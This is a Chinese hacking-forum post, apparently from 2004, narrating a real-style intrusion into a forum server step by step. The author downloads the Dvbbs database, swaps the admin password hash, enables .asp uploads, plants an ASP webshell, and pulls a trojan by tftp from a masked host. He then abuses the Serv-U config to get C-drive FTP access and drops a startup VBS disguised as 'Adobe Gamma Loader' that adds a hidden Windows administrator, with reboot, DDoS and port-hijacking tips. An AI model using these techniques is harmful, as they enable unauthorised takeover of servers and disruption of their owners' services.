QQ登录

只需要一步,快速开始

 注册地址  找回密码
查看: 3972|回复: 3
打印 上一主题 下一主题

黑客后门:asp木马配合servu取管理权限

[复制链接]
字体大小: 正常 放大
韩冰        

823

主题

3

听众

4048

积分

我的地盘我做主

该用户从未签到

发帖功臣 元老勋章

跳转到指定楼层
1#
发表于 2004-10-6 02:09 |只看该作者 |倒序浏览
|招呼Ta 关注Ta

今天心情不好,写一篇文章玩玩吧,利用网站的配置错误配合serv-u取得管理员权限,简单一点就是通过asp木马配合serv-u取得管理员权限,哈哈哈,是不是很cool阿! : h9 w" G9 V) d/ G7 [5 ~' T------------文章开始------------ + v/ F/ M0 w+ _. ` 为了找仓木麻衣的mp3(这个小姑娘的歌很好听阿),把半个互联网都搜完了(太夸张了把),就是找不到,苦然眼镜一亮,哈哈哈×××论坛,看来人气不错,也有mp3的下载地址,那就去看看吧 6 u/ H$ {5 A R- J; }; `/ Y 晕~~~~, + L! W: o( P, X- A$ y1 o' L" H 论坛错误信息 5 Q; c8 {- b4 c0 ? 产生错误的可能原因: ; V1 M, W6 [" Q' c* U" ` 您是否仔细阅读了帮助文件,可能您还没有登陆或者不具有使用当前功能的权限。 & D |1 [$ e3 G1 e! X) M 还要注册阿,可是论坛由于种种原因又不让注册 6 z* R- y9 R7 g8 u4 j r* } 气的我差点吐血! 4 J/ N e0 \. J9 ] 怎么办阿???唉本想用溯雪破解几个密码。可是我们这个落后的地方上网贵,速度慢,有那个钱早就可以去买几张d版cd了,算了想想别的办法把,打开我的xscan,随便扫了一下,服务器挺安全阿,只开了21,80,3389端口 ) N* F4 {. p/ _ O' B. Z; n0 g看来做了端口过滤 ' N& f. {& T8 y8 b2 {$ K 没什么可利用的漏洞怎么办,不要着急,他用的是动网论坛,先试着下载他的数据库试试吧 - a4 L1 F. m% y, \ 手动的找了一些,都不行 ' h+ ]/ _" w% \8 g* f 我先猜一下数据库在哪个目录里面,如果猜对的话下载数据库的成功率就比较高了 - {0 _5 r9 R# o' N' xhttp://aaa.com/data 2 U) G. ?& u8 T http://aaa.com/database 9 [" F) o# l& E8 `# C' `7 S+ ^http://aaa.com/db 6 l; B4 C& W& n, xHTTP 错误 404 - 找不到文件 . Y- c8 X6 _2 k' U# K Internet 信息服务 ) d9 o8 p' P# V8 h7 c 继续 5 H" S# x2 @& s* @* G/ o' l! S6 Vhttp://aaa.com/mdb 4 R/ R5 V; C$ d- f3 O: O; Q' F HTTP 错误 403 - 禁止访问 . @& V. Y6 G, O- U, r$ nInternet Explorer ; @1 D- b0 k1 `, h0 r+ D把我以前些的添加的数据库地址文件载入xscan(专门下载数据库的地址),然后只扫描cgi漏洞 ; ~; h: _' S5 l h7 ~scaning.......,大概10分钟过去了 & }+ {( C2 {0 u: e2 \2 L) }% ]4 H 扫描结果 ) ~4 ?" u) m/ t2 I/mdb/lovemaik.asa [漏洞描述] 8 M" T+ f3 J, ^8 M6 I" W哈哈哈,成功的扫到了数据库 3 G0 f2 v& M" Y5 c 顺便告诉大家一个技巧,把一些常用的数据库地址如data.mdb,database.asp等等添加到xscan的cgi数据库中,或者单独作一个数据库,你可以用一些字典来生成数据库地址,这样的成功率很高的! , j+ ?1 [ c2 \4 Q5 V9 g# o' l打开Net Transport(一种很爽的下载工具)把数据库down过来,用了50多分钟,终于下载完了 ; ~5 i1 L$ r+ J- A2 x- A 在自己的机器上安装jmail和动网论坛,把下载的数据库覆盖新数据库,接着注册用户:allen,密码:123456 & w# j& ?. z. c1 b4 b3 d 调然后把数据库扩展名改为.mdb ,打开 6 s( N1 E0 l9 n) m4 X3 v查看我们刚才注册的用户密码为49ba59abbe56e057(由于论坛使用md5不可逆算法加密,所以不那得到明文密码) e* y: ^( O% k( h3 w: k5 ] 好的把这一串数据复制一下,然后找到管理员的名字,也就是查找userclass表中数据为管理员的名字 5 ]% F+ v4 I8 H+ k把他的密码改成49ba59abbe56e057,记住在改密码之前一定要把他的密码(经过MD5加密过的)复制到一个记事本里 ; M4 Q8 h( J- w8 R! a 好了,我们用管理员的名字登陆,密码就是123456,接着我们就去修改用户资料,把回答问题和答案改掉!把email换成自己的,接着把刚才注册的用户allen提升为管理员,退出,在用allen帐号登陆,把原来的管理员降成普通用户,可能有些会问这样做是为什么,原因是动网论坛不允许管理员通过email取回密码,接着在打开数据库把原来管理员的密码给恢复了,在打开论坛,忘记密码-回答问题-取回密码,哈哈哈,快打开你的信箱把,密码已经发到你信箱了(注意,你的系统最好装jmail等邮件发送组件,要不然就会发不了邮件的) 0 D5 V8 V" Y# s* N( h现在我们拿到了论坛管理员的密码了,登陆那个论坛-进入管理页面-论坛版面管理 -随便选一个讨论区-在上传文件类型中加上.asp,呵呵 ! C9 }- y6 u4 r8 e! I 好了,进去这个讨论区发表帖子-上传文件,呵呵,把asp木马传上去 7 d1 E# v& y7 ~% c; z6 t5 c# N0 y好了,可是这个文件被重命名了,唉,新亏手里还有一个免fso的木马,只有一个文件。传上去 : y' `) A3 a4 \4 E, G- E! I可惜这个木马不好用,还是自己的木马用着顺手,于是tftp -i ***.***.***.*** GET use.asp 1 R7 c- Z' V" i, Z* k1 t- F e+ d好了,成功了,接这运行木马www.***.com/bbs/use.asp?id=1 ! W1 s) E. B1 a! B G呵呵,服务器的东西清清楚楚的摆在我们面前了,上传一个winshell把 3 Z. T& F' r( C* `( z5 y 靠,服务器有病毒防火墙,看看是nav的,算了,自己加个壳把 : f+ l' Q9 F x: W 继续,传上去并执行。。。。没反应! 0 s# B5 S- b n 先telnet ip 8210(我喜欢用noika手机的型号做为端口,^_^) 4 [, |0 D% g5 }9 i0 }' m, f( R 靠,不行,差点忘了,对方做端口过滤了 9 K& b6 {' m' ?/ J8 E8 T5 u( G8 y怎么办阿,试试idq.dll(没报什么希望),果然对方的目录不可执行,在看一下对方有没有装perl - Y6 R9 T, H. e4 r7 q6 C; L: x还是没有!在看看对方是什么分区格式,要是fat32那就好办了,试着删除c:\的任何文件都提示没有权限!唉,麻烦阿!!! ) F( w; B C+ ]% [, l% V 本来想就此打住的时候突然发现了d:\Serv-U,于是我就想通过他来拿到权限 ! b0 z: ~ X& V6 E2 r# ~注:在此之前最好在自己的机器上装一个Serv-U, 4 A& }. H% z* t* K* o g 我们先看看ServUStartUpLog.txt ! S6 x3 G" W; d% a8 A Sat 01Mar01 12:15:24 - Serv-U FTP Server v4.0 (4.1.0.0) - Copyright (c) 1995-2002 Cat 5 z! c% ~9 m: ?6 T" \8 x4 f 。。。。。。。。。。 . ~* c1 R- `3 ^3 S 版本挺新阿,呵呵 * C# y5 B( ~1 N2 K5 k 接着看看ServUDaemon.ini(用户配置文件) ; F% P: R6 E x3 R7 { 哇考,里面的用户真多阿! - `' c1 }. c, I) V F7 d 接着我们把这个文件的内容复制一下,然后粘贴到本地serv-u的ServUDaemon.ini文件中,记住这时候最好停掉你的serv-u,保存文件,接着打开ServUAdmin.exe,重新添加一个用户,记住这个用户最好是管理员权限,必须对目录和文件可以进行读写可执行等一切操作,接着把用户主目录设为c:\ * c* g5 b( A3 @$ R哈哈哈,到次为止大家都知道我的用意了把! & }3 t9 p8 ^+ L+ ]接这ftp上去 ! ^1 H4 c" Y, v- n3 U' W哈哈c盘的东西全部暴露了,现在我们对c盘有读写权限,可以进行任何操作(注意:serv-u的管理员权限和nt的管理员权限不是一样的,serv-u的管理员只能配置serv-u) $ m0 R9 }4 m5 c 由于对方做了端口过滤,办法不是很多,可以参考一篇修改注册表根改端口过滤的文章,是灰色轨迹论坛的一个网友写的,哈哈,在这里就不多说了! + w/ S- t4 T, D# G. j 我们先写一个vbs脚本,把这个脚本重命名为Adobe Gamma Loader,这样管理员不容易发现! $ ]: j) w* O# R0 ]3 O脚本内容: M3 {7 C3 g9 `+ {& K9 Jset wshshell=createobject ("wscript.shell" ) 0 o, I/ H, a- x3 f9 @a=wshshell.run ("cmd.exe /c net user allen ***** /add",0) 3 |) b( F" a( _. L1 L" z% O b=wshshell.run ("cmd.exe /c net localgroup Administrators allen /add",0) : ?3 i4 _( G9 G, Y& G大家都能看懂把,哈哈 : G3 T7 N9 Q2 {) l然后把他传到Documents and Settings\All Users\「开始」菜单\程序\启动\ ( h- d3 a {8 i! A+ s( G9 ?/ i呵呵为什么要vbs脚本呢?原因很简单,就是不让管理员看见那个跳出来的黑黑的dos窗口。

) _) ~1 i% ^- x2 Y8 Q( l

接着用asp木马上传一个shutdown.exe ; l1 {* ?7 ~( z c& A) V 然后执行shutdown.exe 127.0.0.1 /r 5 Y3 Y, @* x' C5 P( Z) r& k哈哈,有时候可能不会成功,是权限的原因,具体。。。我也不太清楚。 1 Y3 t' y9 F r, d8 i/ |$ E不过在nt or 2000上普通用户都可以重起机器 8 {+ Y5 P7 [, Z& o7 k; J还有一个办法就是在你的机器上新建一个计划任务,内容就是定时重启动计算机,然后把他放到对方计划任务的目录下,如果对方没有开计划任务就不行了! 4 O. c3 n3 K! a G 如果还是成功不了你就用ddos把,哈哈,很暴力的让对方拒绝服务,接这就会重启(有可能是管理员操作的)

6 ~. ~# a2 E* \/ _

重启之后只要管理员登陆就可以添加一个帐号,哈哈 ' W3 K! Q" ^) I n& f 到此为止我已经拥有了管理员权限,呵呵

% w7 [9 ^& @: D8 X4 _! }6 `

$ L7 l' p. x' G/ I* b8 j' J; O m (关于端口过滤) 7 L# R! T6 z' h, B一般服务器至少会开21,80端口,像这种情况,即使有了管理员权限也没有多大用处! 3 a; N& ~$ d% C" N$ H9 A' E% l/ a 如果你可以得到一些bbs或者其他程序的管理员密码就比较好办了 . S. F' \3 K9 U4 Q, d1 G2 i; O 先传asp木马,然后用sc停掉ftp服务,接着弄一些后门来占用21端口 7 S+ {3 U- N& M3 c或者干脆暴力的占用!不过这些办法在ntfs的分区上成功率并不高!经过实践我发现一般可以暴力占用80端口,前提是对方web服务器为iis!这样在你没有完全拿到管理员权限之前,对方的网站可能会一直瘫痪,哈哈! ) }- ^& S* n3 D+ y

zan
转播转播0 分享淘帖0 分享分享0 收藏收藏0 支持支持0 反对反对0 微信微信
树二DT        

0

主题

0

听众

4

积分

升级  80%

该用户从未签到

回复

使用道具 举报

0

主题

0

听众

5

积分

升级  0%

该用户从未签到

回复

使用道具 举报

lynli 实名认证       

17

主题

4

听众

266

积分

升级  83%

  • TA的每日心情
    郁闷
    2012-2-11 20:32
  • 签到天数: 7 天

    [LV.3]偶尔看看II

    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册地址

    qq
    收缩
    • 电话咨询

    • 04714969085
    fastpost

    关于我们| 联系我们| 诚征英才| 对外合作| 产品服务| QQ

    手机版|Archiver| |繁體中文 手机客户端  

    蒙公网安备 15010502000194号

    Powered by Discuz! X2.5   © 2001-2013 数学建模网-数学中国 ( 蒙ICP备14002410号-3 蒙BBS备-0002号 )     论坛法律顾问:王兆丰

    GMT+8, 2026-4-20 21:10 , Processed in 0.446951 second(s), 73 queries .

    回顶部